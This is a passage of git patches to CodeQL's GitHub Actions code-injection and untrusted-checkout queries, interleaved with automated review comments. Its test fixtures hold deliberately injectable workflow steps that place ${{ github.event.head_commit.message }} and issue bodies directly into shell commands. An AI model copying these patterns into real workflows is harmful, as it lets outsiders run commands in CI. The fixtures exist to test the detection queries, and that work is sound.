MaDSource extends RemoteFlowSource { MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } abstract class FileSource extends RemoteFlowSource { } 
@@ -228,12 +245,16 @@ class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { + Event event; + CheckoutSource() { // This should be: // source instanceof PRHeadCheckoutStep @@ -245,7 +266,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() + event = uses.getATriggerEvent() and + event.getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout @@ -258,6 +280,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = event } } /** @@ -273,6 +297,8 @@ class DornyPathsFilterSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -294,6 +320,8 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -315,6 +343,8 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { 
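Review bot: In `CheckoutSource` the new field `event` is bound only in the `actions/checkout` disjunct; the `or this.asExpr() instanceof GitMutableRefCheckout` branch shown as trailing context, and whatever disjuncts follow it outside the hunk, do not bind it. If those branches are unchanged, either QL rejects the characteristic predicate for leaving `event` unbound, or — if it is bound in some way not visible here — `getEvent()` is empty for git/gh-based checkouts and any query that now requires `getEvent() = event` silently drops them. Each disjunct should bind the field, e.g. `this.asExpr() instanceof GitMutableRefCheckout and event = this.asExpr().getATriggerEvent()`; alternatively drop the field and define `override Event getEvent() { result = this.asExpr().getATriggerEvent() }` the way `ArtifactSource` above does, keeping the `checkoutTriggers()` name filter on `uses.getATriggerEvent()` as before. The characteristic predicate's body continues outside this hunk.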
@@ -327,6 +357,8 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -348,4 +380,6 @@ class OctokitRequestActionSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } From e34835f71a8fd247afc4ea95d5f8d55785bf6cbb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:23 +0100 Subject: [PATCH 636/707] fix: AstNode.getATriggerEvent() getATriggerEvent did not work for nodes outside a Job. If there is no enclosing job, get the trigger from the enclosing workflow --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ce6db22636cc..5f33400bb962 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -114,7 +114,11 @@ abstract class AstNodeImpl extends TAstNode { /** * Gets and Event triggering this node. */ - EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingJob().getATriggerEvent() + or + not exists(this.getEnclosingJob()) and result = this.getEnclosingWorkflow().getATriggerEvent() + } /** * Gets the enclosing Step. From 62d9302e8ba4de3a8c4558451f8f4e7d88aedc20 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:44 +0100 Subject: [PATCH 637/707] chore: remove leftover commented out code --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 7 ------- 1 file changed, 7 deletions(-) 
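Review bot: The doc comment above the reworked `getATriggerEvent()` in Ast.qll still reads `Gets and Event triggering this node.`; now that the predicate has two cases it should fix the typo and state the fallback, e.g. `/** Gets an event that can trigger this node: the enclosing job's trigger events, or the enclosing workflow's when the node is not inside a job. */`. The fallback is guarded by `not exists(this.getEnclosingJob())`, so a node inside a job whose own `getATriggerEvent()` is empty still yields nothing; if that is intended it deserves a one-line comment, otherwise `not exists(this.getEnclosingJob().getATriggerEvent())` is the broader guard. Which nodes lack an enclosing job (workflow-level `env:` expressions, presumably) is not visible here and is worth naming in the comment.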
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ffbb6fac2637..9653ae2beda1 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,6 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -209,7 +208,6 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink @@ -242,7 +240,6 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and @@ -273,7 +270,6 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) 
@@ -297,7 +293,6 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -318,7 +313,6 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -341,7 +335,6 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) From 792e8555af5b5a6628ee1ab956b81ffdaafe3a96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:56:59 +0100 Subject: [PATCH 638/707] fix: remove context 2 events mappings client_paylaod (dispatch), commits (push), head_commit (push) and merge_group are not under external attacker control so remove them --- ql/lib/ext/config/context_event_map.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 35ccafc5beed..4d28fa778e0f 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml 
@@ -40,14 +40,10 @@ extensions: - ["workflow_run", "github.event.workflow_run"] - ["workflow_run", "github.event.changes"] # workflow_call receives the same event payload as the calling workflow - - ["workflow_call", "github.event.client_payload"] - ["workflow_call", "github.event.comment"] - - ["workflow_call", "github.event.commits"] - ["workflow_call", "github.event.discussion"] - - ["workflow_call", "github.event.head_commit"] - ["workflow_call", "github.event.inputs"] - ["workflow_call", "github.event.issue"] - - ["workflow_call", "github.event.merge_group"] - ["workflow_call", "github.event.pages"] - ["workflow_call", "github.event.pull_request"] - ["workflow_call", "github.event.review"] From 18137f58c299182fbbc1033e323d77c1a072e277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:14 +0100 Subject: [PATCH 639/707] fix: take trigger events into consideration Code Injection remote flow sources should be triggerable by the privileged event --- .../Security/CWE-094/CodeInjectionCritical.ql | 6 +- .../.github/actions/action5/action.yml | 4 +- .../CWE-094/.github/workflows/test21.yml | 24 ++ .../CWE-094/CodeInjectionCritical.expected | 312 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 13 +- 5 files changed, 193 insertions(+), 166 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ef66ac229f2d..a197c5779483 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
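Review bot: The comment `# workflow_call receives the same event payload as the calling workflow` now sits above a list that deliberately omits `client_payload`, `commits`, `head_commit` and `merge_group`, so a later reader will read the gap as an oversight and re-add them. Extend the comment with the rationale from the commit message, e.g. `# workflow_call receives the same event payload as the calling workflow; only fields an external attacker can influence are listed — client_payload, commits, head_commit and merge_group are omitted on purpose because their originating events are not under external control.` Whether those four fields are still mapped for their own events elsewhere in this file is outside the hunk.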
@@ -23,6 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and + source.getNode().(RemoteFlowSource).getEvent() = event and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | @@ -31,5 +32,6 @@ where exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Potential code injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, + event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index a03c27be226b..53a2e0c87e27 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.issue.body }}' - name: Step id: step env: @@ -25,7 +25,7 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.pull_request.body }} + FOO2: ${{ github.event.issue.body }} shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml new file mode 100644 index 000000000000..03ecc20de86a --- /dev/null 
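Review bot: The new conjunct `source.getNode().(RemoteFlowSource).getEvent() = event` makes every result depend on each `RemoteFlowSource` subclass producing an event for the flow's trigger; a source whose `getEvent()` is empty now disappears from this query silently rather than being reported, and nothing here distinguishes "not reachable under the privileged event" from "event not modelled for this source". A comment on that line, e.g. `// keep only flows whose source is reachable under the same privileged event as the sink`, plus a fixture where source and sink are gated by different triggers, would document the intent. The `$@` link text added to the `select` is `event.getLocation().getFile().toString()`, which renders a file path; `event.getName()` (already used with `contextTriggerDataModel` elsewhere in this series) would be the more useful label while the location still drives the link. The `where` clause begins outside the hunk.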
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml
@@ -0,0 +1,24 @@
+on:
+ push:
+ branches:
+ - main
+ - 'release/v*'
+ workflow_dispatch:
+ inputs:
+ version:
+ required: true
+ description: 'Release'
+ type: string
+
+jobs:
+ release-tag:
+ runs-on: ubuntu-latest
+ if: ${{ startsWith(github.event.head_commit.message, 'release:') }}
+ steps:
+ - name: Extract version and PR number from commit message
+ id: extract_info
+ shell: bash
+ run: |
+ echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT
+ echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT
+ echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index dd9836805bd8..4a2950d84ae9 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | 
@@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -612,153 +613,154 @@ subpaths
 | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] |
 | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] |
 #select
-| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} |
-| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} |
-| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. 
